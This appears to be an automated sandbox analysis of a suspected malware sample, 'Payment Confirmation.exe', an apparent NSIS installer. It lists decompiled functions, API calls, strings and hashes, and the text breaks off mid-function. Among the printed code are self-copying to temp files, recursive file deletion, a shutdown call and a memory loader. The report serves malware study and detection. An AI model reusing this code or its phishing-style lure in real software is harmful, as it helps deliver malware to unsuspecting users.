									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E004053E0(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\engineer\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\engineer\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053C3();
											} else {
												E00405346();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t127);
											}
											E00405B98(0x425000,  *(_t129 + 0x20));
											 *0x425400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x423f50; // 0x825438
												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x41f0f0);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\engineer\\Desktop\\Payment Confirmation.exe", 0x41f0f0, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x41f0f0);
														E004058E6(_t149);
														_t93 =  *0x423f50; // 0x825438
														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E004053F8(0x41f0f0);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E004058E6(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040576C(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t124);
									E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030CA(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EBA(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F28(0xd);
					_t47 = E00405F28(0xb);
					 *0x423f44 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x423ff8 = _t47;
					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405B98("agrlexd Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\engineer\\Desktop\\Payment Confirmation.exe\" ";
					E00405B98(_t125, _t51);
					 *0x423f40 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\engineer\\Desktop\\Payment Confirmation.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M0042A001;
					}
					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                                                  0x0040310c
                                                  0x00403110
                                                  0x00403118
                                                  0x0040311c
                                                  0x00403121
                                                  0x00403131
                                                  0x00403134
                                                  0x0040313b
                                                  0x00403142
                                                  0x00403142
                                                  0x0040313b
                                                  0x00403144
                                                  0x00403144
                                                  0x0040325a
                                                  0x0040325a
                                                  0x0040325a
                                                  0x0040325c
                                                  0x0040325e
                                                  0x00000000
                                                  0x00000000
                                                  0x004031f3
                                                  0x004031f6
                                                  0x004031fe
                                                  0x004031fe
                                                  0x00403201
                                                  0x00403206
                                                  0x00403208
                                                  0x00403208
                                                  0x00403209
                                                  0x00403209
                                                  0x0040320e
                                                  0x00403211
                                                  0x0040324a
                                                  0x0040324f
                                                  0x00403254
                                                  0x00403257
                                                  0x00403259
                                                  0x00403259
                                                  0x00403259
                                                  0x00000000
                                                  0x00403213
                                                  0x00403213
                                                  0x00403214
                                                  0x00403217
                                                  0x0040321f
                                                  0x00403222
                                                  0x00403224
                                                  0x00403224
                                                  0x00403224
                                                  0x00403224
                                                  0x00403222
                                                  0x00403229
                                                  0x0040322f
                                                  0x00403237
                                                  0x0040323a
                                                  0x0040323c
                                                  0x0040323c
                                                  0x0040323c
                                                  0x0040323c
                                                  0x0040323a
                                                  0x00403241
                                                  0x00403248
                                                  0x00403262
                                                  0x00403265
                                                  0x00403265
                                                  0x0040326e
                                                  0x00403273
                                                  0x00403273
                                                  0x0040327e
                                                  0x00403284
                                                  0x00403289
                                                  0x0040328b
                                                  0x004032b1
                                                  0x004032b6
                                                  0x004032c0
                                                  0x004032c7
                                                  0x004032cb
                                                  0x00403332
                                                  0x00403332
                                                  0x00403337
                                                  0x0040333d
                                                  0x00403341
                                                  0x00403456
                                                  0x0040345c
                                                  0x004034f9
                                                  0x004034f9
                                                  0x004034fe
                                                  0x00403501
                                                  0x00403503
                                                  0x00403503
                                                  0x0040350b
                                                  0x0040350b
                                                  0x0040346b
                                                  0x00403474
                                                  0x00403476
                                                  0x0040347b
                                                  0x0040347d
                                                  0x0040347f
                                                  0x00403481
                                                  0x00403483
                                                  0x00403485
                                                  0x00403487
                                                  0x00403497
                                                  0x00403499
                                                  0x0040349b
                                                  0x004034a8
                                                  0x004034b7
                                                  0x004034bf
                                                  0x004034c7
                                                  0x004034c7
                                                  0x0040349b
                                                  0x00403487
                                                  0x00403483
                                                  0x004034cb
                                                  0x004034d0
                                                  0x004034d7
                                                  0x004034e5
                                                  0x004034e8
                                                  0x004034ee
                                                  0x004034f0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004034d9
                                                  0x004034df
                                                  0x004034e1
                                                  0x004034e3
                                                  0x004034f2
                                                  0x004034f4
                                                  0x00000000
                                                  0x004034f4
                                                  0x00000000
                                                  0x004034e3
                                                  0x004034d7
                                                  0x00403350
                                                  0x00403357
                                                  0x00403357
                                                  0x004032cd
                                                  0x004032d3
                                                  0x00403322
                                                  0x00403322
                                                  0x0040332e
                                                  0x00000000
                                                  0x0040332e
                                                  0x004032dc
                                                  0x004032e9
                                                  0x004032e0
                                                  0x004032e6
                                                  0x00000000
                                                  0x00000000
                                                  0x004032e8
                                                  0x004032e8
                                                  0x004032e8
                                                  0x004032ed
                                                  0x004032ef
                                                  0x004032f7
                                                  0x00403368
                                                  0x0040336a
                                                  0x00403371
                                                  0x00403379
                                                  0x00403379
                                                  0x00403384
                                                  0x00403389
                                                  0x00403398
                                                  0x0040339c
                                                  0x0040339d
                                                  0x004033a6
                                                  0x0040339f
                                                  0x0040339f
                                                  0x0040339f
                                                  0x004033ac
                                                  0x004033b2
                                                  0x004033b8
                                                  0x004033c0
                                                  0x004033c0
                                                  0x004033ce
                                                  0x004033d5
                                                  0x004033de
                                                  0x004033e4
                                                  0x004033e4
                                                  0x004033f0
                                                  0x004033f6
                                                  0x00403400
                                                  0x0040340a
                                                  0x00403410
                                                  0x00403412
                                                  0x00403414
                                                  0x00403415
                                                  0x00403416
                                                  0x0040341b
                                                  0x00403427
                                                  0x0040342d
                                                  0x00403434
                                                  0x00403437
                                                  0x0040343d
                                                  0x0040343d
                                                  0x00403434
                                                  0x00403412
                                                  0x00403441
                                                  0x00403447
                                                  0x00403447
                                                  0x00403447
                                                  0x0040344a
                                                  0x0040344b
                                                  0x0040344c
                                                  0x0040344c
                                                  0x00000000
                                                  0x00403398
                                                  0x004032f9
                                                  0x004032fb
                                                  0x00403306
                                                  0x00000000
                                                  0x00000000
                                                  0x0040330e
                                                  0x00403319
                                                  0x0040331e
                                                  0x00000000
                                                  0x0040331e
                                                  0x00403293
                                                  0x0040329f
                                                  0x004032a4
                                                  0x004032a9
                                                  0x004032ab
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403248
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004031f8
                                                  0x004031f8
                                                  0x004031f8
                                                  0x004031f9
                                                  0x004031f9
                                                  0x00000000
                                                  0x004031f8
                                                  0x00000000
                                                  0x00403149
                                                  0x0040314a
                                                  0x00403156
                                                  0x0040315c
                                                  0x00000000
                                                  0x0040315e
                                                  0x00403160
                                                  0x00403167
                                                  0x0040316c
                                                  0x00403171
                                                  0x00403178
                                                  0x0040317e
                                                  0x00403194
                                                  0x004031a4
                                                  0x004031a9
                                                  0x004031af
                                                  0x004031b6
                                                  0x004031c9
                                                  0x004031ce
                                                  0x004031d0
                                                  0x004031d2
                                                  0x004031d7
                                                  0x004031d7
                                                  0x004031e7
                                                  0x004031ed
                                                  0x00000000
                                                  0x004031ed

                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403121
                                                  • GetVersion.KERNEL32 ref: 00403127
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                                  • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                                  • OleInitialize.OLE32(00000000), ref: 00403178
                                                  • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                                  • GetCommandLineA.KERNEL32(agrlexd Setup,NSIS Error), ref: 004031A9
                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Payment Confirmation.exe" ,00000000), ref: 004031BC
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Payment Confirmation.exe" ,00409168), ref: 004031E7
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040327E
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                                  • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                  • OleUninitialize.OLE32(00000020), ref: 00403337
                                                  • ExitProcess.KERNEL32 ref: 00403357
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment Confirmation.exe" ,00000000,00000020), ref: 0040336A
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment Confirmation.exe" ,00000000,00000020), ref: 00403379
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment Confirmation.exe" ,00000000,00000020), ref: 00403384
                                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment Confirmation.exe" ,00000000,00000020), ref: 00403390
                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                                  • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\Payment Confirmation.exe,0041F0F0,00000001), ref: 0040340A
                                                  • CloseHandle.KERNEL32(00000000,0041F0F0,0041F0F0,?,0041F0F0,00000000), ref: 00403437
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                                                  • ExitProcess.KERNEL32 ref: 0040350B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                  • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\Payment Confirmation.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment Confirmation.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$agrlexd Setup$~nsu
                                                  • API String ID: 3469842172-3153305205
                                                  • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                  • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                                  • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                  • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004054BD, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040576C(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423fc8 =  *0x423fc8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B98(0x421540, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056D2(_t72);
					} else {
						lstrcatA(0x421540, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421540,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405850(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E84(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423fc8 =  *0x423fc8 + 1;
										} else {
											E00404E84(0xfffffff1, _t72);
											E004058E6(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054BD(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421540 - 0x5c;
					if( *0x421540 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E93(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040568B(_t72);
							E00405850(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E84(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E84(0xfffffff1, _t72);
							return E004058E6(__eflags, _t72, 0);
						}
						L33:
						 *0x423fc8 =  *0x423fc8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                  0x004054c8
                                                  0x004054cc
                                                  0x004054d5
                                                  0x004054d8
                                                  0x004054db
                                                  0x004054e3
                                                  0x004054e5
                                                  0x004054e6
                                                  0x00000000
                                                  0x004054e6
                                                  0x004054f5
                                                  0x004054f5
                                                  0x004054f8
                                                  0x004054fb
                                                  0x0040550f
                                                  0x00405516
                                                  0x0040551b
                                                  0x0040551d
                                                  0x0040552d
                                                  0x0040551f
                                                  0x00405525
                                                  0x00405525
                                                  0x00405532
                                                  0x00405535
                                                  0x00405540
                                                  0x00405546
                                                  0x0040554b
                                                  0x0040555b
                                                  0x0040555d
                                                  0x00405563
                                                  0x00405566
                                                  0x00405569
                                                  0x00405626
                                                  0x00405626
                                                  0x0040562a
                                                  0x0040562c
                                                  0x0040562c
                                                  0x0040562c
                                                  0x0040562c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040556f
                                                  0x0040556f
                                                  0x00405578
                                                  0x0040557e
                                                  0x00405583
                                                  0x00405586
                                                  0x00405588
                                                  0x0040558c
                                                  0x0040558e
                                                  0x0040558e
                                                  0x0040558c
                                                  0x00405591
                                                  0x00405594
                                                  0x004055a7
                                                  0x004055a9
                                                  0x004055ae
                                                  0x004055b5
                                                  0x004055cd
                                                  0x004055d3
                                                  0x004055d9
                                                  0x004055db
                                                  0x00405600
                                                  0x004055dd
                                                  0x004055dd
                                                  0x004055e1
                                                  0x004055f5
                                                  0x004055e3
                                                  0x004055e6
                                                  0x004055ee
                                                  0x004055ee
                                                  0x004055e1
                                                  0x004055b7
                                                  0x004055bd
                                                  0x004055bf
                                                  0x004055c5
                                                  0x004055c5
                                                  0x004055bf
                                                  0x00000000
                                                  0x004055b5
                                                  0x00405596
                                                  0x00405599
                                                  0x0040559b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040559d
                                                  0x0040559f
                                                  0x00000000
                                                  0x00000000
                                                  0x004055a1
                                                  0x004055a5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405605
                                                  0x0040560f
                                                  0x00405615
                                                  0x00405615
                                                  0x00405620
                                                  0x00000000
                                                  0x00405620
                                                  0x00405537
                                                  0x0040553e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004054fd
                                                  0x004054fd
                                                  0x004054ff
                                                  0x00405630
                                                  0x00405633
                                                  0x00405636
                                                  0x00405688
                                                  0x00405688
                                                  0x00405688
                                                  0x00405638
                                                  0x0040563b
                                                  0x00405646
                                                  0x0040564b
                                                  0x0040564d
                                                  0x00000000
                                                  0x00000000
                                                  0x00405650
                                                  0x00405656
                                                  0x0040565c
                                                  0x00405662
                                                  0x00405664
                                                  0x00000000
                                                  0x00405680
                                                  0x00405666
                                                  0x0040566a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040566f
                                                  0x00000000
                                                  0x00405676
                                                  0x0040563d
                                                  0x0040563d
                                                  0x00000000
                                                  0x0040563d
                                                  0x00405505
                                                  0x00405509
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405509

                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                                  • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                                  • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                                  • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                                  • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                                                  • FindClose.KERNEL32(?), ref: 00405620
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004054C7
                                                  • \*.*, xrefs: 0040551F
                                                  • "C:\Users\user\Desktop\Payment Confirmation.exe" , xrefs: 004054BD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\Payment Confirmation.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-783031464
                                                  • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                  • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                                  • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                  • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001A402, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A4DC
                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 1001A506
                                                  • ReadFile.KERNELBASE(00000000,00000000,1001A248,?,00000000), ref: 1001A51D
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 1001A53F
                                                  • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C,7FDFFF66), ref: 1001A5B2
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 1001A5BD
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C), ref: 1001A608
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                  • String ID:
                                                  • API String ID: 656311269-0
                                                  • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                  • Instruction ID: 08dd0d8a1b5c369709eae3767430104e5388ea3a98c6ad7ed95ce82a3af55b79
                                                  • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                  • Instruction Fuzzy Hash: 1F616175E04714ABCB10CFB4C884BAEB7F6EF49650F108059E905EB395E674EE818B54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004061D4, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004061D4() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
